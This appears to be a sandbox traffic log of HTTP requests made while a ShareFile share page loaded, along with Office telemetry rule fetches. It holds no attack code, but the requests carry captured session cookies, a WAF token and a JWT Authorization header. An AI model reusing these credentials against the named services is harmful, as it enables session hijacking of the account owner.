            Source: global trafficHTTP traffic detected: GET /guide-content/u6RYL2wEa9xrpUJMTeOXl41AeJI/qrJmWADnkufXgGqv6M-p2xBSYIU/xBPyrN0M2r6IFxno71T0shlp-Qc.dom.json?sha256=OG9P3pymuWfB-ZaKqljhBPBaH2alktLkYBmVTjLKrSQ HTTP/1.1Host: citrix-sharefile-content.customer.pendo.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-dynamic-forms-pilet/1.25.0/package/dist/91306a69f84f808e9310.woff2 HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://premierbb.sharefile.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-dynamic-forms-pilet/1.25.0/package/dist/main.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /sf/v3/Shares(189361297164461c)/Items(fi43d59f-f50a-8b6c-92c5-82617c12046b)?canCreateRootFolder=false&fileBox=false HTTP/1.1Host: premierbb.sf-api.comConnection: keep-aliveCorrelationId: QCxJiK-9Ggca4b4jrzvREAsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept-Language: ensec-ch-ua-mobile: ?0Authorization: Captcha eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJTdGF0ZSI6InMwNjVhMjMwNDBmZTQ0MzQ0ODYwZjZkMWRkNTgxMGE1MiIsIkV4cGlyZXMiOjE3Mjg0OTg5MzR9.Y4AJ6PQtgj2M2hRvc6eXJhhxLt4TdW-c4HGWWZb80FYUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36X-SF-ClientCapabilities: HardLock,HardQuota,AthenaSSOAccept: application/json, text/plain, */*X-SF-App: ShareFileWebsec-ch-ua-platform: "Windows"Origin: https://premierbb.sharefile.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brCookie: AWSALBTGCORS=BMJ25OaLJ6i9uh9kYz/QU8wXA9gHWpEWOeWM3yFc+/L4YW6OyTjiR3RfGsPmKPpgfStVA2VkzcVrlHnOitOpN1vaPC3eVPJyFF2LuVjj+rNHIRJSCiIi9E8VA9oTrVe4380EWpSQv1WThrqU35FGLlF+mQ07iJoR1U1Qx5N4ig3r; AWSALBCORS=DtGdoTxMG2GmHNUkLl4kwHPVbqdVXglZtGjQoCLIHk28ZSt3FRr1phgXBWkcBCwPmutvxc56AHVcLFyu8z/LXokMCDffEJ7h8hPkG1QB/USEhanT8MN0z9b+gOlP
            Source: global trafficHTTP traffic detected: GET /guide-content/eWI7aCe5RTaQQM3QzyK1rqqWcVM/XNJ1F6ATudKnb82a7viL5T2TM6g/E7DHnb1hOIm90y1iNNrpyuqjzow.dom.json?sha256=tTDEghJvK4ZEfjp-b5MZyPzNBxZZo7r5FOjFFYmu8iA HTTP/1.1Host: citrix-sharefile-content.customer.pendo.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /sf/v3/Items/ContentViewer HTTP/1.1Host: premierbb.sf-api.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AWSALBTG=uc9YkXUSmQh/hvsHGtt0QeZMLvA3+jp9RqPJtZdq4egm5uv034Tko/QOknE0/KxuiIuxyBFwiAUmrml28zZWfTT0M5iX5KaV40CEpjpG8YKij3v4zZKwdrwu7c5/f+utrpCgD9Tx/KwrY48juVOOUAUzNs87Y7QZgiRjUcbfBsgH; AWSALB=3MSsNdqO5nyvroNMj3WTi6td9zpGvx/pc2PCpBmEqLKOzwrauSmB/ZBh7oWzWHIFmXJd9p2fgvXL1TAWTDgZpzI0bgJZ8t8hZK7C3aQjcTjOP/R0nG0extS0FNVK; AWSALBTGCORS=BMJ25OaLJ6i9uh9kYz/QU8wXA9gHWpEWOeWM3yFc+/L4YW6OyTjiR3RfGsPmKPpgfStVA2VkzcVrlHnOitOpN1vaPC3eVPJyFF2LuVjj+rNHIRJSCiIi9E8VA9oTrVe4380EWpSQv1WThrqU35FGLlF+mQ07iJoR1U1Qx5N4ig3r; AWSALBCORS=DtGdoTxMG2GmHNUkLl4kwHPVbqdVXglZtGjQoCLIHk28ZSt3FRr1phgXBWkcBCwPmutvxc56AHVcLFyu8z/LXokMCDffEJ7h8hPkG1QB/USEhanT8MN0z9b+gOlP
            Source: global trafficHTTP traffic detected: GET /sf/v3/Capabilities HTTP/1.1Host: premierbb.sf-api.comConnection: keep-aliveCorrelationId: DCWP8fUNX1JssOmqgGWcpwsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept-Language: ensec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36X-SF-ClientCapabilities: HardLock,HardQuota,AthenaSSOAccept: application/json, text/plain, */*X-SF-App: ShareFileWebsec-ch-ua-platform: "Windows"Origin: https://premierbb.sharefile.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brCookie: AWSALBTGCORS=BMJ25OaLJ6i9uh9kYz/QU8wXA9gHWpEWOeWM3yFc+/L4YW6OyTjiR3RfGsPmKPpgfStVA2VkzcVrlHnOitOpN1vaPC3eVPJyFF2LuVjj+rNHIRJSCiIi9E8VA9oTrVe4380EWpSQv1WThrqU35FGLlF+mQ07iJoR1U1Qx5N4ig3r; AWSALBCORS=DtGdoTxMG2GmHNUkLl4kwHPVbqdVXglZtGjQoCLIHk28ZSt3FRr1phgXBWkcBCwPmutvxc56AHVcLFyu8z/LXokMCDffEJ7h8hPkG1QB/USEhanT8MN0z9b+gOlP
            Source: global trafficHTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /sf/v3/Shares(189361297164461c)?%24expand=Items&includeExpired=false HTTP/1.1Host: premierbb.sf-api.comConnection: keep-aliveCorrelationId: _afhjg3E8hOL5qzqmTziYAsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept-Language: ensec-ch-ua-mobile: ?0Authorization: Captcha eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJTdGF0ZSI6InMwNjVhMjMwNDBmZTQ0MzQ0ODYwZjZkMWRkNTgxMGE1MiIsIkV4cGlyZXMiOjE3Mjg0OTg5MzR9.Y4AJ6PQtgj2M2hRvc6eXJhhxLt4TdW-c4HGWWZb80FYUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36X-SF-ClientCapabilities: HardLock,HardQuota,AthenaSSOAccept: application/json, text/plain, */*X-SF-App: ShareFileWebsec-ch-ua-platform: "Windows"Origin: https://premierbb.sharefile.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brCookie: AWSALBTGCORS=BMJ25OaLJ6i9uh9kYz/QU8wXA9gHWpEWOeWM3yFc+/L4YW6OyTjiR3RfGsPmKPpgfStVA2VkzcVrlHnOitOpN1vaPC3eVPJyFF2LuVjj+rNHIRJSCiIi9E8VA9oTrVe4380EWpSQv1WThrqU35FGLlF+mQ07iJoR1U1Qx5N4ig3r; AWSALBCORS=DtGdoTxMG2GmHNUkLl4kwHPVbqdVXglZtGjQoCLIHk28ZSt3FRr1phgXBWkcBCwPmutvxc56AHVcLFyu8z/LXokMCDffEJ7h8hPkG1QB/USEhanT8MN0z9b+gOlP
            Source: global trafficHTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /sf/v3/Shares(189361297164461c)/Items(fi43d59f-f50a-8b6c-92c5-82617c12046b)?canCreateRootFolder=false&fileBox=false HTTP/1.1Host: premierbb.sf-api.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AWSALBTG=uc9YkXUSmQh/hvsHGtt0QeZMLvA3+jp9RqPJtZdq4egm5uv034Tko/QOknE0/KxuiIuxyBFwiAUmrml28zZWfTT0M5iX5KaV40CEpjpG8YKij3v4zZKwdrwu7c5/f+utrpCgD9Tx/KwrY48juVOOUAUzNs87Y7QZgiRjUcbfBsgH; AWSALB=3MSsNdqO5nyvroNMj3WTi6td9zpGvx/pc2PCpBmEqLKOzwrauSmB/ZBh7oWzWHIFmXJd9p2fgvXL1TAWTDgZpzI0bgJZ8t8hZK7C3aQjcTjOP/R0nG0extS0FNVK; AWSALBTGCORS=pqp6yXTMTsfNQZxuACles9IcH8y8oNTp3VGYUIBzDxMgEgmJeZQLAqMVnhe47Kc0LlizbVyRbT7H0sZlEs5E/HJNcYdSnTTb/okGw2M0zrrGDeCrojvpdCekzxPyWnshWxnWLnR/BapfeIZb9J12Hdqg8ZO5kZBC+mLqPcfyaPIt; AWSALBCORS=G2PG8WjDlVKkQ62HLm/gUKLkDBU85qqzq8ExqW6JWGOaPyTsFjV3zUxNDA+7krs6zy95qLHbY7som3PPYpu08LnZ/1YegF66xCvZaBXVyzcPZMv//nWoa8SeIl00
            Source: global trafficHTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /bundles/ba7dfd1a6326f1b75478.js HTTP/1.1Host: premierbb.sharefile.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://premierbb.sharefile.com/share/view/189361297164461cAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: aws-waf-token=e96a2a16-7e3c-4b99-96e2-f45ab76b2885:EQoAc9l+wdRaAAAA:/zpzslzW74rRLa3+zDOmw9rkfwXqxw3hg+C0B6RR1rwP+TFlS+j/rN6T5YAqeSFtuKBv64TmcZxw+FB4DvYzSE9F/nCN9xkaReQU6+4e1XKoYVzylG+ZEFjO3lBhFfQa5LcjyT/OTFbgqwxbY7ud+FaudFZjJcnCD/zRD8M7TjDIDBCHkaF+EZItW62z8QtlNJ1YsFG6u2rH+9Bg9h1j5y6EC730H93gxv6EHbOFGWN4RaHfN37zY0efjlP3JFIT; AWSALBTG=q1Qp4nMZXWbsDg/0EsBMeuqqx/nwubwCEClHjE69GDApd5aCPyPQGFJ0QxDQORvmlC1N/VuBdY+VvTC2wLf+KcJI4hX7V9r26YLnAPYtQae+6xPyJ5JEc/N2XHBtjGFrhQVEeYi5YOmiopVCC+dAfOvDXkuZebOvn1GTKxk0yESW; AWSALBTGCORS=q1Qp4nMZXWbsDg/0EsBMeuqqx/nwubwCEClHjE69GDApd5aCPyPQGFJ0QxDQORvmlC1N/VuBdY+VvTC2wLf+KcJI4hX7V9r26YLnAPYtQae+6xPyJ5JEc/N2XHBtjGFrhQVEeYi5YOmiopVCC+dAfOvDXkuZebOvn1GTKxk0yESW; AWSALB=1ojIM2AmY8RvcL8lJLQZ4lF5JXtAJ0xYzT2A5wJfBKs0NlJjY+80+632BoZ/aWOhue9ppWqqF833tFzGxlcNUacVFEwHq6Yp4IpJ5sUvTp8ytXjs0l7FZzpFGoYI; AWSALBCORS=1ojIM2AmY8RvcL8lJLQZ4lF5JXtAJ0xYzT2A5wJfBKs0NlJjY+80+632BoZ/aWOhue9ppWqqF833tFzGxlcNUacVFEwHq6Yp4IpJ5sUvTp8ytXjs0l7FZzpFGoYI
            Source: global trafficHTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /sf/v3/Capabilities HTTP/1.1Host: premierbb.sf-api.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AWSALBTG=YX2Bi5ClpfEcoYO3pRNB5IzkJtc9wO0L+PAL6sr9aTyYawDrEKBhopMZMHwxMnauwVDcG+utAE0C9vZEbSpHuwH3C+C/cEKfH66iGRHTHmx8Bp6rgZVZ1z046zHRiG3OyyPN1+oQ6ewN8/mrJNa6zQS+jgdO6rm0tR0Ca46tjQ2D; AWSALBTGCORS=YX2Bi5ClpfEcoYO3pRNB5IzkJtc9wO0L+PAL6sr9aTyYawDrEKBhopMZMHwxMnauwVDcG+utAE0C9vZEbSpHuwH3C+C/cEKfH66iGRHTHmx8Bp6rgZVZ1z046zHRiG3OyyPN1+oQ6ewN8/mrJNa6zQS+jgdO6rm0tR0Ca46tjQ2D; AWSALB=SDiHrJosfItDLTW1O8SQ9jwYFu9CU8cfZF7IvWqVFHTp3ZnMchwL65/ZTHZTbEINZdNEbTMsZImlxRJZ9eKdY3lVRQHS/UXPcMhyGaPu3A6POdtnik7klFJNUQ1O; AWSALBCORS=SDiHrJosfItDLTW1O8SQ9jwYFu9CU8cfZF7IvWqVFHTp3ZnMchwL65/ZTHZTbEINZdNEbTMsZImlxRJZ9eKdY3lVRQHS/UXPcMhyGaPu3A6POdtnik7klFJNUQ1O
            Source: global trafficHTTP traffic detected: GET /sf/v3/Shares(189361297164461c)?%24expand=Items&includeExpired=false HTTP/1.1Host: premierbb.sf-api.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AWSALBTG=YX2Bi5ClpfEcoYO3pRNB5IzkJtc9wO0L+PAL6sr9aTyYawDrEKBhopMZMHwxMnauwVDcG+utAE0C9vZEbSpHuwH3C+C/cEKfH66iGRHTHmx8Bp6rgZVZ1z046zHRiG3OyyPN1+oQ6ewN8/mrJNa6zQS+jgdO6rm0tR0Ca46tjQ2D; AWSALBTGCORS=YX2Bi5ClpfEcoYO3pRNB5IzkJtc9wO0L+PAL6sr9aTyYawDrEKBhopMZMHwxMnauwVDcG+utAE0C9vZEbSpHuwH3C+C/cEKfH66iGRHTHmx8Bp6rgZVZ1z046zHRiG3OyyPN1+oQ6ewN8/mrJNa6zQS+jgdO6rm0tR0Ca46tjQ2D; AWSALB=SDiHrJosfItDLTW1O8SQ9jwYFu9CU8cfZF7IvWqVFHTp3ZnMchwL65/ZTHZTbEINZdNEbTMsZImlxRJZ9eKdY3lVRQHS/UXPcMhyGaPu3A6POdtnik7klFJNUQ1O; AWSALBCORS=SDiHrJosfItDLTW1O8SQ9jwYFu9CU8cfZF7IvWqVFHTp3ZnMchwL65/ZTHZTbEINZdNEbTMsZImlxRJZ9eKdY3lVRQHS/UXPcMhyGaPu3A6POdtnik7klFJNUQ1O
            Source: global trafficHTTP traffic detected: GET /service/contentviewer/launchrequest HTTP/1.1Host: sf-cv.sharefile.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /bundles/2efeefafc2bb68a97d33.js HTTP/1.1Host: premierbb.sharefile.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://premierbb.sharefile.com/share/view/189361297164461cAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: aws-waf-token=e96a2a16-7e3c-4b99-96e2-f45ab76b2885:EQoAc9l+wdRaAAAA:/zpzslzW74rRLa3+zDOmw9rkfwXqxw3hg+C0B6RR1rwP+TFlS+j/rN6T5YAqeSFtuKBv64TmcZxw+FB4DvYzSE9F/nCN9xkaReQU6+4e1XKoYVzylG+ZEFjO3lBhFfQa5LcjyT/OTFbgqwxbY7ud+FaudFZjJcnCD/zRD8M7TjDIDBCHkaF+EZItW62z8QtlNJ1YsFG6u2rH+9Bg9h1j5y6EC730H93gxv6EHbOFGWN4RaHfN37zY0efjlP3JFIT; AWSALBTG=/ZHn9jraXwjXh4cJHxFvHI12Bz0R26u1RcFCs7qbho8G+HhxsM4QvFOyHf667geRWpflI03Ns0d8eZ5RxkclW4+a8n2FUu/uAg3DZM2ZHQSQ4KVwlp6xdoGBFbJt0Eyqi0GigRs/TIlSoV6/cv+t/ynW3Y+7ht3RG7aykME9870a; AWSALBTGCORS=/ZHn9jraXwjXh4cJHxFvHI12Bz0R26u1RcFCs7qbho8G+HhxsM4QvFOyHf667geRWpflI03Ns0d8eZ5RxkclW4+a8n2FUu/uAg3DZM2ZHQSQ4KVwlp6xdoGBFbJt0Eyqi0GigRs/TIlSoV6/cv+t/ynW3Y+7ht3RG7aykME9870a; AWSALB=B0ej6jhjeaOZ64OKJXO/8+uLtqnYvt8+fa9tLxKZDfo8ptJ0ZM0xSAyAse+wMQy+P4yvnJl2kbwaHiY3qRixhFVuePNMtA3npzTbyBWOJqAQI827AlHD7CVXTnIf; AWSALBCORS=B0ej6jhjeaOZ64OKJXO/8+uLtqnYvt8+fa9tLxKZDfo8ptJ0ZM0xSAyAse+wMQy+P4yvnJl2kbwaHiY3qRixhFVuePNMtA3npzTbyBWOJqAQI827AlHD7CVXTnIf
            Source: global trafficHTTP traffic detected: GET /bundles/b5bef5c91ec3b83469e0.js HTTP/1.1Host: premierbb.sharefile.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://premierbb.sharefile.com/share/view/189361297164461cAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: aws-waf-token=e96a2a16-7e3c-4b99-96e2-f45ab76b2885:EQoAc9l+wdRaAAAA:/zpzslzW74rRLa3+zDOmw9rkfwXqxw3hg+C0B6RR1rwP+TFlS+j/rN6T5YAqeSFtuKBv64TmcZxw+FB4DvYzSE9F/nCN9xkaReQU6+4e1XKoYVzylG+ZEFjO3lBhFfQa5LcjyT/OTFbgqwxbY7ud+FaudFZjJcnCD/zRD8M7TjDIDBCHkaF+EZItW62z8QtlNJ1YsFG6u2rH+9Bg9h1j5y6EC730H93gxv6EHbOFGWN4RaHfN37zY0efjlP3JFIT; AWSALBTG=/ZHn9jraXwjXh4cJHxFvHI12Bz0R26u1RcFCs7qbho8G+HhxsM4QvFOyHf667geRWpflI03Ns0d8eZ5RxkclW4+a8n2FUu/uAg3DZM2ZHQSQ4KVwlp6xdoGBFbJt0Eyqi0GigRs/TIlSoV6/cv+t/ynW3Y+7ht3RG7aykME9870a; AWSALBTGCORS=/ZHn9jraXwjXh4cJHxFvHI12Bz0R26u1RcFCs7qbho8G+HhxsM4QvFOyHf667geRWpflI03Ns0d8eZ5RxkclW4+a8n2FUu/uAg3DZM2ZHQSQ4KVwlp6xdoGBFbJt0Eyqi0GigRs/TIlSoV6/cv+t/ynW3Y+7ht3RG7aykME9870a; AWSALB=B0ej6jhjeaOZ64OKJXO/8+uLtqnYvt8+fa9tLxKZDfo8ptJ0ZM0xSAyAse+wMQy+P4yvnJl2kbwaHiY3qRixhFVuePNMtA3npzTbyBWOJqAQI827AlHD7CVXTnIf; AWSALBCORS=B0ej6jhjeaOZ64OKJXO/8+uLtqnYvt8+fa9tLxKZDfo8ptJ0ZM0xSAyAse+wMQy+P4yvnJl2kbwaHiY3qRixhFVuePNMtA3npzTbyBWOJqAQI827AlHD7CVXTnIf
            Source: global trafficHTTP traffic detected: GET /bundles/d178f6eceb0126b1e292.js HTTP/1.1Host: premierbb.sharefile.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://premierbb.sharefile.com/share/view/189361297164461cAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: aws-waf-token=e96a2a16-7e3c-4b99-96e2-f45ab76b2885:EQoAc9l+wdRaAAAA:/zpzslzW74rRLa3+zDOmw9rkfwXqxw3hg+C0B6RR1rwP+TFlS+j/rN6T5YAqeSFtuKBv64TmcZxw+FB4DvYzSE9F/nCN9xkaReQU6+4e1XKoYVzylG+ZEFjO3lBhFfQa5LcjyT/OTFbgqwxbY7ud+FaudFZjJcnCD/zRD8M7TjDIDBCHkaF+EZItW62z8QtlNJ1YsFG6u2rH+9Bg9h1j5y6EC730H93gxv6EHbOFGWN4RaHfN37zY0efjlP3JFIT; AWSALBTG=/ZHn9jraXwjXh4cJHxFvHI12Bz0R26u1RcFCs7qbho8G+HhxsM4QvFOyHf667geRWpflI03Ns0d8eZ5RxkclW4+a8n2FUu/uAg3DZM2ZHQSQ4KVwlp6xdoGBFbJt0Eyqi0GigRs/TIlSoV6/cv+t/ynW3Y+7ht3RG7aykME9870a; AWSALBTGCORS=/ZHn9jraXwjXh4cJHxFvHI12Bz0R26u1RcFCs7qbho8G+HhxsM4QvFOyHf667geRWpflI03Ns0d8eZ5RxkclW4+a8n2FUu/uAg3DZM2ZHQSQ4KVwlp6xdoGBFbJt0Eyqi0GigRs/TIlSoV6/cv+t/ynW3Y+7ht3RG7aykME9870a; 